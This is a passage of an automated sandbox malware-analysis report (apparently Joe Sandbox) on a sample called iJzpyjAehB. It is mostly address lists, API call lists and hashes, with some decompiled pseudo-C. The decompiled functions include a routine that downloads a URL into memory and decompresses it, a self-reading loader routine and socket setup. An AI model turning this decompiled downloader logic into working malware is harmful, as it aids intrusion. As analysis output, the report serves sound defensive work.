                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040037c6
                                                                                                                                                                                                                                                                          0x0400385d
                                                                                                                                                                                                                                                                          0x04003875
                                                                                                                                                                                                                                                                          0x04003875
                                                                                                                                                                                                                                                                          0x0400385d
                                                                                                                                                                                                                                                                          0x0400387c
                                                                                                                                                                                                                                                                          0x04003893
                                                                                                                                                                                                                                                                          0x040038a2
                                                                                                                                                                                                                                                                          0x040038a2
                                                                                                                                                                                                                                                                          0x040038b3
                                                                                                                                                                                                                                                                          0x040038c7
                                                                                                                                                                                                                                                                          0x040038c7
                                                                                                                                                                                                                                                                          0x040036af
                                                                                                                                                                                                                                                                          0x040038d4
                                                                                                                                                                                                                                                                          0x040038d4
                                                                                                                                                                                                                                                                          0x04003664
                                                                                                                                                                                                                                                                          0x04003635
                                                                                                                                                                                                                                                                          0x040038e0

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?), ref: 040035F4
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 0400362D
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 04003651
                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 04003673
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0400369C
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 040036DD
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0400371F
                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,-00000001), ref: 0400380C
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.dll), ref: 0400381E
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 0400383C
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 040038B3
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040038C7
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 040038D4
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$Virtual$FreeHandleModule$AllocCloseCreateNameReadSizelstrcatlstrcpylstrcpynlstrlen
                                                                                                                                                                                                                                                                          • String ID: .dll
                                                                                                                                                                                                                                                                          • API String ID: 4040249471-2738580789
                                                                                                                                                                                                                                                                          • Opcode ID: 200bb4075ff646b41afc5d2470261fe04451761bc05d74db12b83caaac164272
                                                                                                                                                                                                                                                                          • Instruction ID: c2c5132629a25a5507b869beac9dac576087064a04ada7ddd23a517ed68c32e0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 200bb4075ff646b41afc5d2470261fe04451761bc05d74db12b83caaac164272
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC814EB5940228ABEB35DF50DC89BDDB7B5AB48304F1081D8EA09B7280D674AFC4CF55
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                                                                                          			E04002AF0(char* _a4, intOrPtr _a8, long _a12, signed char _a16) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                                                                                                          				void* _v88;
                                                                                                                                                                                                                                                                          				signed int _v92;
                                                                                                                                                                                                                                                                          				long _v96;
                                                                                                                                                                                                                                                                          				void _v100;
                                                                                                                                                                                                                                                                          				void _v356;
                                                                                                                                                                                                                                                                          				long _v360;
                                                                                                                                                                                                                                                                          				long _v364;
                                                                                                                                                                                                                                                                          				intOrPtr _v368;
                                                                                                                                                                                                                                                                          				void* _v372;
                                                                                                                                                                                                                                                                          				long _v376;
                                                                                                                                                                                                                                                                          				void* _v380;
                                                                                                                                                                                                                                                                          				signed char _v381;
                                                                                                                                                                                                                                                                          				long _v388;
                                                                                                                                                                                                                                                                          				long _v392;
                                                                                                                                                                                                                                                                          				void* _v396;
                                                                                                                                                                                                                                                                          				char _v652;
                                                                                                                                                                                                                                                                          				long _v656;
                                                                                                                                                                                                                                                                          				long _v660;
                                                                                                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                                                                                                          				void* _t140;
                                                                                                                                                                                                                                                                          				void* _t142;
                                                                                                                                                                                                                                                                          				long _t149;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if( *0x4013b80 == 0 || _a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                          					L25:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					memcpy( &_v84, "Accept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip, deflate\r\n", 0x10 << 2);
                                                                                                                                                                                                                                                                          					asm("movsw");
                                                                                                                                                                                                                                                                          					asm("movsb");
                                                                                                                                                                                                                                                                          					_v92 = 0x80000200;
                                                                                                                                                                                                                                                                          					if((_a16 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_v92 = _v92 | 0x00803000;
                                                                                                                                                                                                                                                                          						_v96 = 4;
                                                                                                                                                                                                                                                                          						_t139 =  *0x4013b80; // 0x0
                                                                                                                                                                                                                                                                          						InternetQueryOptionA(_t139, 0x1f,  &_v100,  &_v96);
                                                                                                                                                                                                                                                                          						_v100 = _v100 | 0x00000100;
                                                                                                                                                                                                                                                                          						_t140 =  *0x4013b80; // 0x0
                                                                                                                                                                                                                                                                          						InternetSetOptionA(_t140, 0x1f,  &_v100, 4);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t142 =  *0x4013b80; // 0x0
                                                                                                                                                                                                                                                                          					_v88 = InternetOpenUrlA(_t142, _a4,  &_v84, 0x42, _v92, 0);
                                                                                                                                                                                                                                                                          					if(_v88 == 0) {
                                                                                                                                                                                                                                                                          						_v660 = GetLastError();
                                                                                                                                                                                                                                                                          						goto L25;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_v360 = 0x100;
                                                                                                                                                                                                                                                                          						E04007D20( &_v356,  &_v356, 0, 0x100);
                                                                                                                                                                                                                                                                          						_v364 = 0;
                                                                                                                                                                                                                                                                          						if(HttpQueryInfoA(_v88, 0x13,  &_v356,  &_v360,  &_v364) == 0) {
                                                                                                                                                                                                                                                                          							L23:
                                                                                                                                                                                                                                                                          							InternetCloseHandle(_v88);
                                                                                                                                                                                                                                                                          							goto L25;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v368 = E04007DD0( &_v356);
                                                                                                                                                                                                                                                                          						if(_v368 != 0xc8) {
                                                                                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v372 = VirtualAlloc(0, _a12, 0x3000, 4);
                                                                                                                                                                                                                                                                          						if(_v372 == 0) {
                                                                                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v388 = 0;
                                                                                                                                                                                                                                                                          						_v376 = 0;
                                                                                                                                                                                                                                                                          						_v380 = _v372;
                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                          							InternetReadFile(_v88, _v380, _a12,  &_v376);
                                                                                                                                                                                                                                                                          							if(_v376 == 0) {
                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v388 = _v388 + _v376;
                                                                                                                                                                                                                                                                          							_v380 = _v380 + _v376;
                                                                                                                                                                                                                                                                          							_t149 = _a12 - _v376;
                                                                                                                                                                                                                                                                          							_a12 = _t149;
                                                                                                                                                                                                                                                                          							if(_t149 >= 0) {
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							L16:
                                                                                                                                                                                                                                                                          							_v8 = _v388;
                                                                                                                                                                                                                                                                          							_v396 = _v372;
                                                                                                                                                                                                                                                                          							_v392 = 0x100;
                                                                                                                                                                                                                                                                          							E04007D20(_v388,  &_v652, 0, 0x100);
                                                                                                                                                                                                                                                                          							_v381 = 0;
                                                                                                                                                                                                                                                                          							if(HttpQueryInfoA(_v88, 0x1d,  &_v652,  &_v392,  &_v364) != 0 && lstrcmpiA( &_v652, "gzip") == 0) {
                                                                                                                                                                                                                                                                          								_v656 = E04002E00(_v388, _v372, _v388, _a8, _a12);
                                                                                                                                                                                                                                                                          								if(_v656 > 0) {
                                                                                                                                                                                                                                                                          									_v8 = _v656;
                                                                                                                                                                                                                                                                          									_v396 = _a8;
                                                                                                                                                                                                                                                                          									_v381 = 1;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							if((_v381 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          								E04007B70(_a8, _v372, _v8);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							VirtualFree(_v372, 0, 0x8000);
                                                                                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}



























                                                                                                                                                                                                                                                                          0x04002afb
                                                                                                                                                                                                                                                                          0x04002b09
                                                                                                                                                                                                                                                                          0x04002df2
                                                                                                                                                                                                                                                                          0x04002dfa
                                                                                                                                                                                                                                                                          0x04002b2d
                                                                                                                                                                                                                                                                          0x04002b3a
                                                                                                                                                                                                                                                                          0x04002b3c
                                                                                                                                                                                                                                                                          0x04002b3e
                                                                                                                                                                                                                                                                          0x04002b3f
                                                                                                                                                                                                                                                                          0x04002b4c
                                                                                                                                                                                                                                                                          0x04002b57
                                                                                                                                                                                                                                                                          0x04002b5a
                                                                                                                                                                                                                                                                          0x04002b6b
                                                                                                                                                                                                                                                                          0x04002b72
                                                                                                                                                                                                                                                                          0x04002b81
                                                                                                                                                                                                                                                                          0x04002b8c
                                                                                                                                                                                                                                                                          0x04002b93
                                                                                                                                                                                                                                                                          0x04002b93
                                                                                                                                                                                                                                                                          0x04002ba9
                                                                                                                                                                                                                                                                          0x04002bb6
                                                                                                                                                                                                                                                                          0x04002bbd
                                                                                                                                                                                                                                                                          0x04002de0
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002bc3
                                                                                                                                                                                                                                                                          0x04002bc3
                                                                                                                                                                                                                                                                          0x04002bdb
                                                                                                                                                                                                                                                                          0x04002be3
                                                                                                                                                                                                                                                                          0x04002c10
                                                                                                                                                                                                                                                                          0x04002dce
                                                                                                                                                                                                                                                                          0x04002dd2
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002dd2
                                                                                                                                                                                                                                                                          0x04002c25
                                                                                                                                                                                                                                                                          0x04002c35
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002c4e
                                                                                                                                                                                                                                                                          0x04002c5b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002c61
                                                                                                                                                                                                                                                                          0x04002c6b
                                                                                                                                                                                                                                                                          0x04002c7b
                                                                                                                                                                                                                                                                          0x04002c81
                                                                                                                                                                                                                                                                          0x04002c97
                                                                                                                                                                                                                                                                          0x04002ca4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002cb4
                                                                                                                                                                                                                                                                          0x04002cc6
                                                                                                                                                                                                                                                                          0x04002ccf
                                                                                                                                                                                                                                                                          0x04002cd5
                                                                                                                                                                                                                                                                          0x04002cd8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002cdc
                                                                                                                                                                                                                                                                          0x04002cde
                                                                                                                                                                                                                                                                          0x04002ce4
                                                                                                                                                                                                                                                                          0x04002ced
                                                                                                                                                                                                                                                                          0x04002cf3
                                                                                                                                                                                                                                                                          0x04002d0b
                                                                                                                                                                                                                                                                          0x04002d13
                                                                                                                                                                                                                                                                          0x04002d3d
                                                                                                                                                                                                                                                                          0x04002d70
                                                                                                                                                                                                                                                                          0x04002d7d
                                                                                                                                                                                                                                                                          0x04002d85
                                                                                                                                                                                                                                                                          0x04002d8b
                                                                                                                                                                                                                                                                          0x04002d91
                                                                                                                                                                                                                                                                          0x04002d91
                                                                                                                                                                                                                                                                          0x04002d7d
                                                                                                                                                                                                                                                                          0x04002da1
                                                                                                                                                                                                                                                                          0x04002db2
                                                                                                                                                                                                                                                                          0x04002db7
                                                                                                                                                                                                                                                                          0x04002dc8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002dc8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002ca6
                                                                                                                                                                                                                                                                          0x04002bbd

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 04002B72
                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04002B93
                                                                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(00000000,00000000,?,00000042,80000200,00000000), ref: 04002BB0
                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 04002C08
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04002C48
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000000,00000000), ref: 04002C97
                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,0000001D,?,00000100,00000000), ref: 04002D35
                                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,gzip), ref: 04002D4B
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002DC8
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002DD2
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04002DDA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate, xrefs: 04002B32
                                                                                                                                                                                                                                                                          • gzip, xrefs: 04002D3F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Internet$Query$HttpInfoOptionVirtual$AllocCloseErrorFileFreeHandleLastOpenReadlstrcmpi
                                                                                                                                                                                                                                                                          • String ID: Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate$gzip
                                                                                                                                                                                                                                                                          • API String ID: 2564233093-2863726208
                                                                                                                                                                                                                                                                          • Opcode ID: 726b61e79d92e4b1ea791cc461ac74fab5e679057ddcff3c63822b6443729a61
                                                                                                                                                                                                                                                                          • Instruction ID: 59e70dbda308a2a2546c0d296605ce979221f8659c43edef85f985c08622dbb4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 726b61e79d92e4b1ea791cc461ac74fab5e679057ddcff3c63822b6443729a61
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B91FC75904218ABEB65CF94CC48BEAB7B5BB48304F50819DE609BB280DB796E84CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                                                                                                                          			E00401A87(struct HWND__* _a4, struct HDC__** _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                          				struct tagPIXELFORMATDESCRIPTOR _v56;
                                                                                                                                                                                                                                                                          				void* _v72;
                                                                                                                                                                                                                                                                          				PIXELFORMATDESCRIPTOR* _v76;
                                                                                                                                                                                                                                                                          				int _v80;
                                                                                                                                                                                                                                                                          				intOrPtr _v96;
                                                                                                                                                                                                                                                                          				int _t35;
                                                                                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                                                                                          				struct HDC__** _t63;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				 *_a8 = GetDC(_a4);
                                                                                                                                                                                                                                                                          				memset( &_v56, 0, 0x28 << 0);
                                                                                                                                                                                                                                                                          				_v56.nSize = 0x28;
                                                                                                                                                                                                                                                                          				_v56.nVersion = 1;
                                                                                                                                                                                                                                                                          				_v56.dwFlags = 0x25;
                                                                                                                                                                                                                                                                          				_v56.iPixelType = 0;
                                                                                                                                                                                                                                                                          				_v56.cColorBits = 0x18;
                                                                                                                                                                                                                                                                          				_v56.cDepthBits = 0x10;
                                                                                                                                                                                                                                                                          				_v56.iLayerType = 0;
                                                                                                                                                                                                                                                                          				_t35 = ChoosePixelFormat( *_a8,  &_v56);
                                                                                                                                                                                                                                                                          				_t63 = _t59 - 0x3c + 0xc - 8;
                                                                                                                                                                                                                                                                          				_v16 = _t35;
                                                                                                                                                                                                                                                                          				_v76 =  &_v56;
                                                                                                                                                                                                                                                                          				_v80 = _v16;
                                                                                                                                                                                                                                                                          				 *_t63 =  *_a8;
                                                                                                                                                                                                                                                                          				SetPixelFormat(??, ??, ??);
                                                                                                                                                                                                                                                                          				 *_a12 = wglCreateContext( *_a8);
                                                                                                                                                                                                                                                                          				_v96 =  *_a12;
                                                                                                                                                                                                                                                                          				 *(_t63 - 8) =  *_a8;
                                                                                                                                                                                                                                                                          				return wglMakeCurrent(??, ??);
                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                          0x00401aa2
                                                                                                                                                                                                                                                                          0x00401ab4
                                                                                                                                                                                                                                                                          0x00401ab6
                                                                                                                                                                                                                                                                          0x00401abc
                                                                                                                                                                                                                                                                          0x00401ac2
                                                                                                                                                                                                                                                                          0x00401ac9
                                                                                                                                                                                                                                                                          0x00401acd
                                                                                                                                                                                                                                                                          0x00401ad1
                                                                                                                                                                                                                                                                          0x00401ad5
                                                                                                                                                                                                                                                                          0x00401ae8
                                                                                                                                                                                                                                                                          0x00401aed
                                                                                                                                                                                                                                                                          0x00401af0
                                                                                                                                                                                                                                                                          0x00401afb
                                                                                                                                                                                                                                                                          0x00401b02
                                                                                                                                                                                                                                                                          0x00401b06
                                                                                                                                                                                                                                                                          0x00401b09
                                                                                                                                                                                                                                                                          0x00401b26
                                                                                                                                                                                                                                                                          0x00401b32
                                                                                                                                                                                                                                                                          0x00401b36
                                                                                                                                                                                                                                                                          0x00401b47

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.558886062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558685401.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558979025.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559069325.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559239825.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559886186.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FormatPixel$ChooseContextCreateCurrentMake
                                                                                                                                                                                                                                                                          • String ID: %$(
                                                                                                                                                                                                                                                                          • API String ID: 2475745930-93983813
                                                                                                                                                                                                                                                                          • Opcode ID: bd8fdc46a3119f9d830930fbf617ed2ae314094ba22175109ede142dcb2d6e48
                                                                                                                                                                                                                                                                          • Instruction ID: 29c35ce5724b02326a6e865684fa907032f963153ea5e9f52b2dfbce4176bea2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd8fdc46a3119f9d830930fbf617ed2ae314094ba22175109ede142dcb2d6e48
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44210C74A057489FCB00EF69D18558EBBF1EF89314F00C469E848AB354E775EA18CB56
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 100014DB
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 10001507
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.607930216.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10001000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                          • Opcode ID: 29cfafdec3d3a1262f4827b6cae24ea1b9a18653203c5f05ee1a645c7d2a8912
                                                                                                                                                                                                                                                                          • Instruction ID: 25e538b33cc42fa1af6dbc26f5ecb21efd633c51d41fb312bc782d6f26faee88
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29cfafdec3d3a1262f4827b6cae24ea1b9a18653203c5f05ee1a645c7d2a8912
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1871F874E04109EFEB08DF94C990AAEB7B2FF48345F248598E915AB345D735EE81CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                                                                                                                          			E0400A090(signed int __eax, intOrPtr _a4, signed short _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                                                                                          				signed char _v8;
                                                                                                                                                                                                                                                                          				short _v12;
                                                                                                                                                                                                                                                                          				signed char _v13;
                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				short _v34;
                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                                                                                          				char* _t42;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_push(6);
                                                                                                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                                                                                                          				_push(2);
                                                                                                                                                                                                                                                                          				L0400B210();
                                                                                                                                                                                                                                                                          				_v20 = __eax;
                                                                                                                                                                                                                                                                          				if(_v20 != 0xffffffff) {
                                                                                                                                                                                                                                                                          					_v36 = 2;
                                                                                                                                                                                                                                                                          					_push(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                                          					L0400B20A();
                                                                                                                                                                                                                                                                          					_v34 = 2;
                                                                                                                                                                                                                                                                          					_push(_a4);
                                                                                                                                                                                                                                                                          					L0400B204();
                                                                                                                                                                                                                                                                          					_v12 = 2;
                                                                                                                                                                                                                                                                          					if(_v12 == 0) {
                                                                                                                                                                                                                                                                          						return 0xffffffffffffffff;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0xc))))));
                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                          					_v13 = 0;
                                                                                                                                                                                                                                                                          					_v40 = 0;
                                                                                                                                                                                                                                                                          					while(_v40 < _a12) {
                                                                                                                                                                                                                                                                          						_push(0x10);
                                                                                                                                                                                                                                                                          						_t42 =  &_v36;
                                                                                                                                                                                                                                                                          						_push(_t42);
                                                                                                                                                                                                                                                                          						_push(_v20);
                                                                                                                                                                                                                                                                          						L0400B1FE();
                                                                                                                                                                                                                                                                          						if(_t42 != 0) {
                                                                                                                                                                                                                                                                          							_v40 = _v40 + 1;
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v13 = 1;
                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if((_v13 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						if(_a16 != 0) {
                                                                                                                                                                                                                                                                          							_v44 = _a16;
                                                                                                                                                                                                                                                                          							_push(4);
                                                                                                                                                                                                                                                                          							_push( &_v44);
                                                                                                                                                                                                                                                                          							_push(0x1005);
                                                                                                                                                                                                                                                                          							_push(0xffff);
                                                                                                                                                                                                                                                                          							_push(_v20);
                                                                                                                                                                                                                                                                          							L0400B1F2();
                                                                                                                                                                                                                                                                          							_push(4);
                                                                                                                                                                                                                                                                          							_push( &_v44);
                                                                                                                                                                                                                                                                          							_push(0x1006);
                                                                                                                                                                                                                                                                          							_push(0xffff);
                                                                                                                                                                                                                                                                          							_push(_v20);
                                                                                                                                                                                                                                                                          							L0400B1F2();
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						return _v20;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t40 = _v20;
                                                                                                                                                                                                                                                                          					_push(_t40);
                                                                                                                                                                                                                                                                          					L0400B1F8();
                                                                                                                                                                                                                                                                          					return _t40 | 0xffffffff;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v20;
                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                          0x0400a096
                                                                                                                                                                                                                                                                          0x0400a098
                                                                                                                                                                                                                                                                          0x0400a09a
                                                                                                                                                                                                                                                                          0x0400a09c
                                                                                                                                                                                                                                                                          0x0400a0a1
                                                                                                                                                                                                                                                                          0x0400a0a8
                                                                                                                                                                                                                                                                          0x0400a0b7
                                                                                                                                                                                                                                                                          0x0400a0bf
                                                                                                                                                                                                                                                                          0x0400a0c0
                                                                                                                                                                                                                                                                          0x0400a0c5
                                                                                                                                                                                                                                                                          0x0400a0cc
                                                                                                                                                                                                                                                                          0x0400a0cd
                                                                                                                                                                                                                                                                          0x0400a0d2
                                                                                                                                                                                                                                                                          0x0400a0d9
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a0ea
                                                                                                                                                                                                                                                                          0x0400a0e5
                                                                                                                                                                                                                                                                          0x0400a0f2
                                                                                                                                                                                                                                                                          0x0400a0f9
                                                                                                                                                                                                                                                                          0x0400a0fd
                                                                                                                                                                                                                                                                          0x0400a10f
                                                                                                                                                                                                                                                                          0x0400a117
                                                                                                                                                                                                                                                                          0x0400a119
                                                                                                                                                                                                                                                                          0x0400a11c
                                                                                                                                                                                                                                                                          0x0400a120
                                                                                                                                                                                                                                                                          0x0400a121
                                                                                                                                                                                                                                                                          0x0400a128
                                                                                                                                                                                                                                                                          0x0400a10c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a10c
                                                                                                                                                                                                                                                                          0x0400a12a
                                                                                                                                                                                                                                                                          0x00000000
